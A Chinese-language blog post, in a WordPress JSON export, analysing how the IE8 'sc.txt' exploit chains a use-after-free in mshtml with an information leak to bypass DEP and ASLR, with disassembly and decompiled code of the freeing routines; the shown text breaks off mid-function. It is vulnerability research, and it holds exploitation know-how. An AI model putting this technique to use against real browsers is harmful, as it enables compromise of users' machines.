{"id":773,"date":"2011-12-13T14:47:07","date_gmt":"2011-12-13T06:47:07","guid":{"rendered":"http:\/\/notes.zerobox.org\/?p=773"},"modified":"2011-12-13T14:47:07","modified_gmt":"2011-12-13T06:47:07","slug":"ie8-sc-txt-exploit-%e5%88%86%e6%9e%90%e5%ad%a6%e4%b9%a0","status":"publish","type":"post","link":"http:\/\/zerobox.org\/notes\/773.html","title":{"rendered":"IE8 sc.txt exploit \u5206\u6790\u5b66\u4e60"},"content":{"rendered":"

\u6765\u6e90\uff1ahttp:\/\/blog.vulnhunt.com\/index.php\/2011\/11\/17\/ie8-sc-txt-exploit-analysis\/<\/a><\/p>\n

\u8f6f\u4ef6\u7248\u672c\uff1aInternet Explorer8.0.7601.17514 WIN7 SP1<\/p>\n

\u5206\u6790\u8005 \uff1aphperl of Code Audit Labs of vulnhunt.com<\/p>\n

http:\/\/blog.vulnhunt.com\/index.php\/2011\/11\/17\/ie8-sc-txt-exploit-analysis\/<\/a><\/p>\n

\u5df2\u6709\u53c2\u8003<\/h3>\n

http:\/\/www.80vul.com\/ie8\/win7\/sc.txt<\/a>
\nhttp:\/\/hi.baidu.com\/ring04h\/blog\/item\/eecf13adcd7e05154b36d68d.html<\/a><\/p>\n

2 Vulnerability Details<\/h2>\n

\u8be5exploit\u5229\u7528\u4e86\u4e24\u4e2a\u6f0f\u6d1e\u5b9e\u73b0\u4e86\u4e0d\u7528heap spray\u65b9\u6cd5bypass DEP&ASLR\uff0c\u7b2c\u4e00\u4e2a\u6f0f\u6d1e\u662fuse after free\u7c7b\u578b\u7684\u6f0f\u6d1e\uff0c\u901a\u8fc7\u6b64\u6f0f\u6d1e\u53ef\u4ee5\u83b7\u53d6\u5230mshtml\u7684\u5730\u5740\u5e76\u89e6\u53d1shellcode\u7684\u6267\u884c\uff0c\u7b2c\u4e8c\u4e2a\u6f0f\u6d1e\u662f\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e\uff0c\u6f0f\u6d1e\u6cc4\u9732\u7684\u5730\u5740\u6307\u5411\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7JavaScript\u8bed\u53e5\u63a7\u5236\u7684\u5185\u5b58\u3002<\/p>\n

3 \u6f0f\u6d1e\u5206\u6790<\/h2>\n

3.1.\u00a0\u00a0\u00a0\u00a0\u00a0 use after free\u6f0f\u6d1e\u5206\u6790<\/h3>\n

\u5f53\u6267\u884cexpvalueclass.onpropertychange = null;\u65f6\uff0c\u4f1a\u8c03\u7528\u5230\u4e0b\u9762\u7684\u65b9\u6cd5\uff0c\u8be5\u65b9\u6cd5\u5148\u5220\u9664\u539f\u6765\u7684\u5c5e\u6027\u503c\uff0c\u7136\u540e\u8bbe\u7f6e\u65b0\u503c\u3002<\/p>\n

\n
\n\n\n\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n
9<\/div>\n
10<\/div>\n
11<\/div>\n
12<\/div>\n
13<\/div>\n
14<\/div>\n
15<\/div>\n
16<\/div>\n
17<\/div>\n
18<\/div>\n
19<\/div>\n
20<\/div>\n
21<\/div>\n
22<\/div>\n
23<\/div>\n
24<\/div>\n
25<\/div>\n
26<\/div>\n
27<\/div>\n
28<\/div>\n
29<\/div>\n
30<\/div>\n
31<\/div>\n
32<\/div>\n
33<\/div>\n
34<\/div>\n
35<\/div>\n
36<\/div>\n
37<\/div>\n
38<\/div>\n
39<\/div>\n
40<\/div>\n
41<\/div>\n
42<\/div>\n
43<\/div>\n
44<\/div>\n
45<\/div>\n
46<\/div>\n
47<\/div>\n
48<\/div>\n
49<\/div>\n
50<\/div>\n
51<\/div>\n
52<\/div>\n
53<\/div>\n
54<\/div>\n
55<\/div>\n<\/td>\n
\n
\n
.text:74DC4275 ; public: long __thiscall CBase::SetCodeProperty(long, struct IDispatch *, int *)<\/code><\/div>\n
.text:74DC4275 ?SetCodeProperty@CBase@@QAEJJPAUIDispatch@@PAH@Z proc near<\/code><\/div>\n
.text:74DC4275\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; CODE XREF: BASICPROPPARAMS::SetCodeProperty(tagVARIANT *,CBase *,CVoid *)+2Ep<\/code><\/div>\n
.text:74DC4275\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; CScriptElement::CommitFunctionPointersCode(CBase *,int)+1F7065p ...<\/code><\/div>\n
.text:74DC4275<\/code><\/div>\n
.text:74DC4275 var_4\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = dword ptr -4<\/code><\/div>\n
.text:74DC4275 arg_0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = dword ptr\u00a0 8<\/code><\/div>\n
.text:74DC4275 arg_4\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = dword ptr\u00a0 0Ch<\/code><\/div>\n
.text:74DC4275 arg_8\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = dword ptr\u00a0 10h<\/code><\/div>\n
.text:74DC4275<\/code><\/div>\n
.text:74DC4275 ; FUNCTION CHUNK AT .text:74EA8AA0 SIZE 00000007 BYTES<\/code><\/div>\n
.text:74DC4275<\/code><\/div>\n
.text:74DC4275\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 edi, edi<\/code><\/div>\n
.text:74DC4277\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 ebp<\/code><\/div>\n
.text:74DC4278\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 ebp, esp<\/code><\/div>\n
.text:74DC427A\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 ecx<\/code><\/div>\n
.text:74DC427B\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 and\u00a0\u00a0\u00a0\u00a0 [ebp+var_4], 0<\/code><\/div>\n
.text:74DC427F\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 edi<\/code><\/div>\n
.text:74DC4280\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 0<\/code><\/div>\n
.text:74DC4282\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 [ebp+arg_0]<\/code><\/div>\n
.text:74DC4285\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 esi<\/code><\/div>\n
.text:74DC4286\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call\u00a0\u00a0\u00a0 ?DidFindAAIndexAndDelete@CBase@@QAEHJW4AATYPE@CAttrValue@@@Z ; CBase::DidFindAAIndexAndDelete(long,CAttrValue::AATYPE)<\/code><\/div>\n
\/\/\u8c03\u7528\u51fd\u6570\u5220\u9664\u539f\u6765\u7684\u5c5e\u6027<\/code><\/div>\n
.text:74DC428B\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 3<\/code><\/div>\n
.text:74DC428D\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 [ebp+arg_0]<\/code><\/div>\n
.text:74DC4290\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 edi, eax<\/code><\/div>\n
.text:74DC4292\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 esi<\/code><\/div>\n
.text:74DC4293\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call\u00a0\u00a0\u00a0 ?DidFindAAIndexAndDelete@CBase@@QAEHJW4AATYPE@CAttrValue@@@Z ; CBase::DidFindAAIndexAndDelete(long,CAttrValue::AATYPE)<\/code><\/div>\n
.text:74DC4298\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 ecx, [ebp+arg_4]<\/code><\/div>\n
.text:74DC429B\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 or\u00a0\u00a0\u00a0\u00a0\u00a0 edi, eax<\/code><\/div>\n
.text:74DC429D\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 test\u00a0\u00a0\u00a0 ecx, ecx<\/code><\/div>\n
.text:74DC429F\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 jz\u00a0\u00a0\u00a0\u00a0\u00a0 short loc_74DC42B0<\/code><\/div>\n
.text:74DC42A1\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 20h<\/code><\/div>\n
.text:74DC42A3\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 [ebp+arg_0]<\/code><\/div>\n
.text:74DC42A6\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 eax, esi<\/code><\/div>\n
.text:74DC42A8\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call\u00a0\u00a0\u00a0 ?AddDispatchObject@CBase@@QAEJJPAUIDispatch@@W4AATYPE@CAttrValue@@W4AAExtraBits@4@@Z ; CBase::AddDispatchObject(long,IDispatch *,CAttrValue::AATYPE,CAttrValue::AAExtraBits)<\/code><\/div>\n
.text:74DC42AD\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 [ebp+var_4], eax<\/code><\/div>\n
.text:74DC42B0<\/code><\/div>\n
.text:74DC42B0 loc_74DC42B0:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; CODE XREF: CBase::SetCodeProperty(long,IDispatch *,int *)+2Aj<\/code><\/div>\n
.text:74DC42B0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 eax, [esi]<\/code><\/div>\n
.text:74DC42B2\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 0<\/code><\/div>\n
.text:74DC42B4\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 0<\/code><\/div>\n
.text:74DC42B6\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 800117B6h<\/code><\/div>\n
.text:74DC42BB\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 ecx, esi<\/code><\/div>\n
.text:74DC42BD\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call\u00a0\u00a0\u00a0 dword ptr [eax+98h]<\/code><\/div>\n
.text:74DC42C3\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 eax, [ebp+arg_8]<\/code><\/div>\n
.text:74DC42C6\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 test\u00a0\u00a0\u00a0 eax, eax<\/code><\/div>\n
.text:74DC42C8\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 jnz\u00a0\u00a0\u00a0\u00a0 loc_74EA8AA0<\/code><\/div>\n
.text:74DC42CE<\/code><\/div>\n
.text:74DC42CE loc_74DC42CE:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; CODE XREF: CBase::SetCodeProperty(long,IDispatch *,int *)+E482Dj<\/code><\/div>\n
.text:74DC42CE\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 eax, [ebp+var_4]<\/code><\/div>\n
.text:74DC42D1\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 pop\u00a0\u00a0\u00a0\u00a0 edi<\/code><\/div>\n
.text:74DC42D2\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 leave<\/code><\/div>\n
.text:74DC42D3\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 retn\u00a0\u00a0\u00a0 0Ch<\/code><\/div>\n
.text:74DC42D3 ?SetCodeProperty@CBase@@QAEJJPAUIDispatch@@PAH@Z endp<\/code><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

\u6700\u7ec8\u4f1a\u8c03\u7528\u5230CAttrArray::Destroy\u65b9\u6cd5\uff0c\u8be5\u65b9\u6cd5\u5148\u91ca\u653e\u5c5e\u6027\u503c\uff0c\u8fd4\u56de\u540e\u4ece\u5c5e\u6027\u6570\u7ec4\u4e2d\u5220\u9664\u8be5\u5c5e\u6027\u3002<\/p>\n

\n
\n\n\n\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n
9<\/div>\n
10<\/div>\n
11<\/div>\n
12<\/div>\n
13<\/div>\n
14<\/div>\n
15<\/div>\n
16<\/div>\n
17<\/div>\n
18<\/div>\n
19<\/div>\n
20<\/div>\n
21<\/div>\n
22<\/div>\n
23<\/div>\n
24<\/div>\n
25<\/div>\n
26<\/div>\n
27<\/div>\n
28<\/div>\n
29<\/div>\n
30<\/div>\n
31<\/div>\n
32<\/div>\n
33<\/div>\n
34<\/div>\n
35<\/div>\n
36<\/div>\n
37<\/div>\n
38<\/div>\n
39<\/div>\n<\/td>\n
\n
\n
.text:74E3F034 ; protected: void __thiscall CAttrArray::Destroy(int)<\/code><\/div>\n
.text:74E3F034 ?Destroy@CAttrArray@@IAEXH@Z proc near\u00a0 ; CODE XREF: CAttrArray::Set(long,PROPERTYDESC const *,tagVARIANT const *,CAttrValue::AATYPE,ushort,int)+D506p<\/code><\/div>\n
.text:74E3F034\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; CBase::DeleteAt(ulong)+10p ...<\/code><\/div>\n
.text:74E3F034<\/code><\/div>\n
.text:74E3F034 ; FUNCTION CHUNK AT .text:74E784C3 SIZE 0000001E BYTES<\/code><\/div>\n
.text:74E3F034 ; FUNCTION CHUNK AT .text:74E8909D SIZE 0000000C BYTES<\/code><\/div>\n
.text:74E3F034<\/code><\/div>\n
.text:74E3F034\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 edi, edi<\/code><\/div>\n
.text:74E3F036\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 edi<\/code><\/div>\n
.text:74E3F037\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 edi, eax<\/code><\/div>\n
.text:74E3F039\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 eax, [esi+10h]<\/code><\/div>\n
.text:74E3F03C\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 ecx, eax<\/code><\/div>\n
.text:74E3F03E\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 shr\u00a0\u00a0\u00a0\u00a0 ecx, 1<\/code><\/div>\n
.text:74E3F040\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 test\u00a0\u00a0\u00a0 cl, 1<\/code><\/div>\n
.text:74E3F043\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 jnz\u00a0\u00a0\u00a0\u00a0 loc_74E8909D<\/code><\/div>\n
.text:74E3F049<\/code><\/div>\n
.text:74E3F049 loc_74E3F049:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; CODE XREF: CAttrArray::Destroy(int)+4A06Aj<\/code><\/div>\n
.text:74E3F049\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 ecx, edi<\/code><\/div>\n
.text:74E3F04B\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 shl\u00a0\u00a0\u00a0\u00a0 ecx, 4<\/code><\/div>\n
.text:74E3F04E\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 add\u00a0\u00a0\u00a0\u00a0 ecx, [esi+0Ch]<\/code><\/div>\n
.text:74E3F051\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 cmp\u00a0\u00a0\u00a0\u00a0 byte ptr [ecx], 3<\/code><\/div>\n
.text:74E3F054\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 jnz\u00a0\u00a0\u00a0\u00a0 loc_74E784C3<\/code><\/div>\n
.text:74E3F05A<\/code><\/div>\n
.text:74E3F05A loc_74E3F05A:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; CODE XREF: CAttrArray::Destroy(int)+394A8j<\/code><\/div>\n
.text:74E3F05A\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call\u00a0\u00a0\u00a0 ?Free@CAttrValue@@QAEXXZ ; CAttrValue::Free(void)<\/code><\/div>\n
.text:74E3F05F\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 eax, [esi+10h]<\/code><\/div>\n
.text:74E3F062\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 shr\u00a0\u00a0\u00a0\u00a0 eax, 1<\/code><\/div>\n
.text:74E3F064\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 test\u00a0\u00a0\u00a0 al, 1<\/code><\/div>\n
.text:74E3F066\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 jnz\u00a0\u00a0\u00a0\u00a0 loc_74E890A3<\/code><\/div>\n
.text:74E3F06C<\/code><\/div>\n
.text:74E3F06C loc_74E3F06C:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; CODE XREF: CAttrArray::Destroy(int)+4A070j<\/code><\/div>\n
.text:74E3F06C\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 10h<\/code><\/div>\n
.text:74E3F06E\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 pop\u00a0\u00a0\u00a0\u00a0 eax<\/code><\/div>\n
.text:74E3F06F\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 edx, esi<\/code><\/div>\n
.text:74E3F071\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call\u00a0\u00a0\u00a0 ?Delete@CImplAry@@IAEXIH@Z ; CImplAry::Delete(uint,int)<\/code><\/div>\n
\/\/\u8c03\u7528\u51fd\u6570\u4ece\u5c5e\u6027\u6570\u7ec4\u4e2d\u5220\u9664\u8be5\u7d22\u5f15\u5bf9\u5e94\u7684\u5c5e\u6027<\/code><\/div>\n
.text:74E3F076\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 pop\u00a0\u00a0\u00a0\u00a0 edi<\/code><\/div>\n
.text:74E3F077\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 retn<\/code><\/div>\n
.text:74E3F077 ?Destroy@CAttrArray@@IAEXH@Z endp<\/code><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

\u5982\u679c\u8be5\u9879\u5c5e\u6027\u503c\u6307\u5411\u7684\u662f\u63a5\u53e3\u6307\u9488\uff0c\u5219\u4f1a\u91ca\u653e\u8be5\u63a5\u53e3\uff0c\u6b64\u5904onpropertychange\u5c5e\u6027\u6307\u5411\u7684\u662fTEAROFF_THUNK\u7ed3\u6784\uff0c\u4f7f\u7528PlainRelease\u51fd\u6570\u91ca\u653e\u8be5\u63a5\u53e3\u6307\u9488\u3002<\/p>\n

\n
\n\n\n\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n
9<\/div>\n
10<\/div>\n
11<\/div>\n
12<\/div>\n
13<\/div>\n
14<\/div>\n
15<\/div>\n
16<\/div>\n
17<\/div>\n
18<\/div>\n
19<\/div>\n
20<\/div>\n
21<\/div>\n
22<\/div>\n
23<\/div>\n
24<\/div>\n
25<\/div>\n
26<\/div>\n
27<\/div>\n
28<\/div>\n
29<\/div>\n
30<\/div>\n
31<\/div>\n
32<\/div>\n
33<\/div>\n
34<\/div>\n
35<\/div>\n
36<\/div>\n
37<\/div>\n
38<\/div>\n
39<\/div>\n<\/td>\n
\n
\n
int __stdcall PlainRelease(LONG a1)<\/code><\/div>\n
{<\/code><\/div>\n
LONG v1; \/\/ eax@7<\/code><\/div>\n
LONG v2; \/\/ eax@8<\/code><\/div>\n
bool v3; \/\/ zf@1<\/code><\/div>\n
int result; \/\/ eax@1<\/code><\/div>\n
<\/div>\n
v3 = (*(_DWORD *)(a1 + 4))-- == 1;<\/code><\/div>\n
result = *(_DWORD *)(a1 + 4);<\/code><\/div>\n
if ( v3 )<\/code><\/div>\n
{<\/code><\/div>\n
if ( *(_DWORD *)(a1 + 12) && !(*(_BYTE *)(a1 + 28) & 4) )<\/code><\/div>\n
(*(void (__stdcall **)(_DWORD))(*(_DWORD *)(a1 + 16) + 8))(*(_DWORD *)(a1 + 12));<\/code><\/div>\n
if ( *(_DWORD *)(a1 + 20) )<\/code><\/div>\n
(*(void (__stdcall **)(_DWORD))(*(_DWORD *)(a1 + 24) + 8))(*(_DWORD *)(a1 + 20));<\/code><\/div>\n
v1 = InterlockedExchange(&dword_7515B03C, a1);<\/code><\/div>\n
if ( v1 )<\/code><\/div>\n
{<\/code><\/div>\n
v2 = InterlockedExchange(&dword_7515B040, v1);<\/code><\/div>\n
if ( v2 )<\/code><\/div>\n
